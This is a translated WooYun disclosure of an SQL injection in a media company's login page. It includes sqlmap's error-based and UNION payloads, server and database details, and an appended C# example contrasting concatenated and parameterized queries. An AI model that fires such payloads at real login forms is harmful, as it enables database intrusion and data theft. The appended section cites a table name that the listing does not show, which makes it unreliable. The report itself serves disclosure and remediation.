Vulnerability summary

Defect ID: wooyun-2015-0141687

Title: SQL injection vulnerability in a back-end system of 天华世纪传媒 (Tianhua Shiji Media)

Vendor: cncert (CNCERT, China's National Computer Network Emergency Response Technical Team/Coordination Center)

Author: 金枪银矛小霸王

Submitted: 2015-09-19 09:03

Fixed: 2015-11-05 16:02

Published: 2015-11-05 16:02

Vulnerability type: SQL injection

Severity: Low

Self-assessed Rank: 5

Status: handed over to a third-party partner organization (cncert) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-09-19: Details sent to the vendor; awaiting vendor handling
2015-09-21: cncert was unable to reach the responsible organization; details disclosed only to the reporting agency
2015-10-01: Details disclosed to core white hats and domain experts
2015-10-11: Details disclosed to regular white hats
2015-10-21: Details disclosed to intern white hats
2015-11-05: Details disclosed to the public

Brief description:

...

Detailed description:

Address:

http://**.**.**.**/passport/login.aspx


sqlmap identified the following injection point(s) with a total of 179 HTTP(s) requests:
---
Parameter: UserName (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwULLTE4NjcwMDk4OTkPZBYCZg9kFgICCQ8PFgIeBFRleHQFG+eUqOaIt+WQjeaIluWvhueggemUmeivr++8gWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRBJbWFnZUJ1dHRvbkxvZ2luBQxJbWFnZUJ1dHRvbjIEVuZ6bz00CeUvgNlfm9vRR0UL4g==&UserName=Hguh' AND 6522=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6522=6522) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(107)+CHAR(113))) AND 'Burx'='Burx&UserPassword=&ImageButtonLogin.x=1&ImageButtonLogin.y=1&__EVENTVALIDATION=/wEWBQKcrYWyDAKvruq2CALIk7LNDgLz+OWrDgLSwtXkAqxteLMW5ZsMf3D2yysG5k8u+52m
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: __VIEWSTATE=/wEPDwULLTE4NjcwMDk4OTkPZBYCZg9kFgICCQ8PFgIeBFRleHQFG+eUqOaIt+WQjeaIluWvhueggemUmeivr++8gWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRBJbWFnZUJ1dHRvbkxvZ2luBQxJbWFnZUJ1dHRvbjIEVuZ6bz00CeUvgNlfm9vRR0UL4g==&UserName=Hguh' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(115)+CHAR(101)+CHAR(120)+CHAR(121)+CHAR(84)+CHAR(102)+CHAR(73)+CHAR(84)+CHAR(81)+CHAR(69)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &UserPassword=&ImageButtonLogin.x=1&ImageButtonLogin.y=1&__EVENTVALIDATION=/wEWBQKcrYWyDAKvruq2CALIk7LNDgLz+OWrDgLSwtXkAqxteLMW5ZsMf3D2yysG5k8u+52m
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000


Current user

current user:    'thsj'


Current database

current database:    'thsj_knowledge'


Tables

Database: thsj_knowledge
[134 tables]

Proof of vulnerability:

(The sqlmap output given here is identical to the one shown in the detailed description above.)

Fix recommendation:

Input filtering

Copyright notice: please credit 金枪银矛小霸王@乌云 (WooYun) when reposting
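Filtering alone is a weak fix for this class of bug. The example below is an added illustration, not the affected site's code: it contrasts the string-concatenation pattern that lets the POSTed UserName value become part of the SQL statement with a parameterized SqlCommand that keeps the statement text fixed. The table name thsj_user comes from the sqlmap listing above; the column names, parameter sizes and connection handling are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added illustration only (not the vendor's code). thsj_user is a table name from the
// sqlmap listing on this page; UserName and PasswordHash are hypothetical columns.
public static class LoginQueries
{
    // Vulnerable pattern: the submitted user name is spliced into the SQL text, so a
    // value containing a closing quote followed by SQL (as in the sqlmap payload above)
    // is executed by SQL Server. Blacklisting quotes does not reliably prevent this.
    public static bool LoginUnsafe(SqlConnection conn, string userName, string passwordHash)
    {
        string sql = "SELECT COUNT(*) FROM thsj_user WHERE UserName = '" + userName +
                     "' AND PasswordHash = '" + passwordHash + "'";
        using (var cmd = new SqlCommand(sql, conn))
        {
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // Hardened version: the statement text never changes; user input is sent as typed
    // parameters and is compared as data, whatever characters it contains.
    public static bool LoginSafe(SqlConnection conn, string userName, string passwordHash)
    {
        const string sql = "SELECT COUNT(*) FROM thsj_user " +
                           "WHERE UserName = @user AND PasswordHash = @hash";
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@user", SqlDbType.NVarChar, 50).Value = userName;
            cmd.Parameters.Add("@hash", SqlDbType.NVarChar, 64).Value = passwordHash;
            return (int)cmd.ExecuteScalar() > 0;
        }
    }
}
```

Two further mitigations matter for this finding: the error-based technique sqlmap reported depends on SQL Server error text reaching the client, so detailed error pages should be disabled in production, and the application's database login should have only the rights the login page needs rather than broad read access to the whole thsj_knowledge database.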


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-09-21 16:01

Vendor reply:

No direct handling channel with the organization administering the site has been established yet; awaiting claim.

Latest status:

None